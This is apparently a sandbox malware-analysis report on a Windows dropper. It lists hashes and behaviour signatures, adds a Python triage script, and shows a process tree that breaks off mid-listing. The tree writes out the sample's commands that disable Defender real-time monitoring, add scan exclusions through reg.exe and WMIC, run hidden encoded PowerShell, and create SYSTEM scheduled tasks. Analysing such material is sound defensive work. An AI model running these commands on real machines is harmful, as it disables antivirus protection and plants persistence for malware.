
Analysis

  • max time kernel
    201s
  • max time network
    202s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    22/07/2024, 05:12 UTC

General

  • Target

    b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe

  • Size

    7.2MB

  • MD5

    7f19c9c2900a42a22935eda2a8399084

  • SHA1

    73509d0c7d2622167aa308de5d23dcced192c5df

  • SHA256

    b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3

  • SHA512

    62e10a813c0205c986ac41b443d6b32d8ce8d6d3a3943142147431965e10a2cc3d6919b71843a329aa3914e2d8a4a158d52475ca1cbee8a9f030562694bba95c

  • SSDEEP

    196608:91OeNXiH6xUi1X18htRrPIPX2zSB23e0d:3OwXK6xLpivPY2zOwes

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with its console window hidden (-WindowStyle Hidden).

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
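Every Defender-tampering step in the process tree below is a one-liner through reg.exe, WMIC or schtasks, each written twice (/reg:32 and /reg:64) and under both the direct Defender key and the Policies key, and the three short-lived Admin tasks all carry the same base64-encoded PowerShell. The script below is an added example, not part of the tria.ge report or of the sample: it takes command lines copied from this report as constructed input, decodes the -EncodedCommand blob (base64 of UTF-16LE), collects the excluded paths and extensions while collapsing the duplicates, tracks DisableRealtimeMonitoring being set and later removed, and lists tasks registered to run as SYSTEM. The regular expressions are heuristics written for this report's quoting style, not a general Windows command-line parser.

```python
"""Triage helpers for the Defender-tampering and persistence command lines in
this report. Added example; not part of the tria.ge report or of the sample."""
import base64
import binascii
import re

# Constructed sample input: command lines copied from the process tree in this
# report (one per distinct behaviour, plus one Policies/reg:64 duplicate).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"',
    r'schtasks /CREATE /TN "bbMwfSaEkvrmTtNtmp" /SC once /ST 05:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe\" cK /msRididIcQ 525403 /S" /V1 /F',
    r'schtasks /CREATE /TN "gCslMOAcq" /SC once /ST 02:15:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True',
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64',
    r'schtasks /CREATE /TN "LTdmnWMddFrWELagp" /SC once /ST 01:01:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe\" aK /QhUOdidwt 525403 /S" /V1 /F',
]

# Heuristic patterns (assumption: values are quoted the way this report shows them).
ENC_CMD_RE = re.compile(r'(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})', re.I)
REG_RE = re.compile(r'\breg(?:\.exe)?"?\s+(add|delete)\s+"?(HKLM\\[^"]+)"?', re.I)
REG_VALUE_RE = re.compile(r'/v\s+(?:"([^"]+)"|(\S+))', re.I)
REG_DATA_RE = re.compile(r'/d\s+(\S+)', re.I)
WMIC_EXCL_RE = re.compile(r'MSFT_MpPreference\s+call\s+Add\s+Exclusion(Extension|Path|Process)=(\S+)', re.I)
SCHTASKS_RE = re.compile(r'\bschtasks(?:\.exe)?"?\s+/create\b', re.I)
TASK_NAME_RE = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_USER_RE = re.compile(r'/ru\s+(?:"([^"]+)"|(\S+))', re.I)
TASK_CMD_RE = re.compile(r'/tr\s+"((?:\\"|[^"])*)"', re.I)   # keeps escaped \" inside /TR
EXCLUSIONS_KEY = r"windows defender\exclusions\paths"       # same suffix under Policies
RTP_KEY = r"windows defender\real-time protection"


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_CMD_RE.search(cmdline)
    if not m:
        return None
    try:  # PowerShell expects base64 over the UTF-16LE bytes of the script
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _first(m):
    """First non-empty capture group of a match (quoted or bare value)."""
    return next(g for g in m.groups() if g is not None)


def triage(cmdlines):
    """Summarise Defender tampering and SYSTEM persistence across command lines."""
    out = {"exclusion_paths": set(), "exclusion_extensions": set(),
           "realtime_monitoring": [], "system_tasks": {}, "decoded_powershell": []}
    for cmd in cmdlines:
        decoded = decode_encoded_command(cmd)
        if decoded:
            out["decoded_powershell"].append(decoded)
        w = WMIC_EXCL_RE.search(cmd)           # WMIC MSFT_MpPreference Add Exclusion*=
        if w and w.group(1).lower() == "extension":
            out["exclusion_extensions"].add(w.group(2).lower())
        r = REG_RE.search(cmd)                 # reg add/delete under a Defender key
        if r:
            op, key = r.group(1).lower(), r.group(2).lower()
            v = REG_VALUE_RE.search(cmd)
            value = _first(v) if v else ""
            if key.endswith(EXCLUSIONS_KEY) and op == "add":
                out["exclusion_paths"].add(value)   # set: /reg:32, /reg:64, Policies collapse
            elif key.endswith(RTP_KEY) and value.lower() == "disablerealtimemonitoring":
                d = REG_DATA_RE.search(cmd)
                disabled = op == "add" and d is not None and d.group(1) == "1"
                out["realtime_monitoring"].append("disabled" if disabled else "restored")
        if SCHTASKS_RE.search(cmd):            # tasks created to run as SYSTEM
            u = TASK_USER_RE.search(cmd)
            if u and _first(u).lower() == "system":
                n, t = TASK_NAME_RE.search(cmd), TASK_CMD_RE.search(cmd)
                out["system_tasks"][_first(n)] = t.group(1) if t else ""
    return out


if __name__ == "__main__":
    for k, v in triage(SAMPLE_CMDLINES).items():
        print(f"{k}: {sorted(v) if isinstance(v, set) else v}")
```

On this report's input the encoded blob decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, a group-policy refresh issued right after each batch of Policies-key writes; the nine distinct excluded paths match the drop locations used elsewhere in the tree, and the two SYSTEM tasks are the stage handoffs (ikkfONE.exe, pjDElFp.exe). The `/reg:32` and `/reg:64` pairs are the same write to both registry views, which is why a detection should key on the value written rather than count reg.exe launches.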

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe
    "C:\Users\Admin\AppData\Local\Temp\b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Users\Admin\AppData\Local\Temp\7zSCC35.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\Users\Admin\AppData\Local\Temp\7zSCDCA.tmp\Install.exe
        .\Install.exe /ZwkdidgjGba "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2464
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2852
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2736
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bbMwfSaEkvrmTtNtmp" /SC once /ST 05:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe\" cK /msRididIcQ 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2336
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1004
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {19DAB8F3-616D-424D-A3F4-4F8A8809284F} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe
      C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe cK /msRididIcQ 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gCslMOAcq" /SC once /ST 02:15:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2020
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gCslMOAcq"
        3⤵
        PID:1712
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gCslMOAcq"
        3⤵
        PID:2984
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        3⤵
        PID:464
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:1932
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        3⤵
        PID:1636
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2944
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gEqEqakXx" /SC once /ST 02:25:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2016
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gEqEqakXx"
        3⤵
        PID:752
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gEqEqakXx"
        3⤵
        PID:2444
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
        3⤵
        PID:1924
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          4⤵
          PID:1624
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:984
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:2516
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:3008
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:1936
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:864
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:2760
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2824
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:2836
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2892
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C copy nul "C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf"
        3⤵
        PID:2884
      • C:\Windows\SysWOW64\wscript.exe
        wscript "C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf"
        3⤵
        • Modifies data under HKEY_USERS
        PID:2860
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2636
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2880
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2660
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2416
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2368
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2012
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2664
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2004
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:1740
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2680
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2340
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1700
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:1660
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1556
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:540
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2932
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2948
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2240
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2244
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:300
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2980
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1932
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2944
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:620
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1780
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2028
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2208
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1032
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:924
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1060
        • C:\Windows\SysWOW64\reg.exe
